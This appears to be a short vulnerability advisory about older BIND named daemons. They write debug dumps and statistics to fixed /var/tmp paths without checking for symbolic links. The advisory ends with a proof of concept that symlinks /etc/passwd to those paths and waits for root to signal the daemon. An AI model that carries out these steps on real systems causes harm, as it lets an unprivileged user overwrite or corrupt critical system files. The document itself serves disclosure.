21 lines
No EOL
877 B
Text
21 lines
No EOL
877 B
Text
source: http://www.securityfocus.com/bid/80/info
|
|
|
|
The named daemon will dump the named database to /var/tmp/named_dump.db
|
|
when it receives a SIGINT signal. It does not check for symbolic links while
|
|
doing so and can be made to overwrite any file in the system.
|
|
|
|
The named daemons will append named statistics to /var/tmp/named.stats
|
|
when it receives a SIGIOT signal. It does not check for symbolic links while
|
|
doing so and ca be made to append to any file in the system.
|
|
|
|
BIND 8.1.x is not vulnerable as it uses a private directory specified in
|
|
named.{boot,conf} for temporary and debug dumps.
|
|
|
|
$ ls -l /var/tmp/named_dump.db
|
|
/var/tmp/named_dump.db not found
|
|
$ ls -l /var/tmp/named.stats
|
|
/var/tmp/named.stats not found
|
|
$ ln -s /etc/passwd /var/tmp/named_dump.db
|
|
$ ln -s /etc/passwd /var/tmp/named.stats
|
|
|
|
[ wait for root to send a SIGINT or SIGIOT to named ] |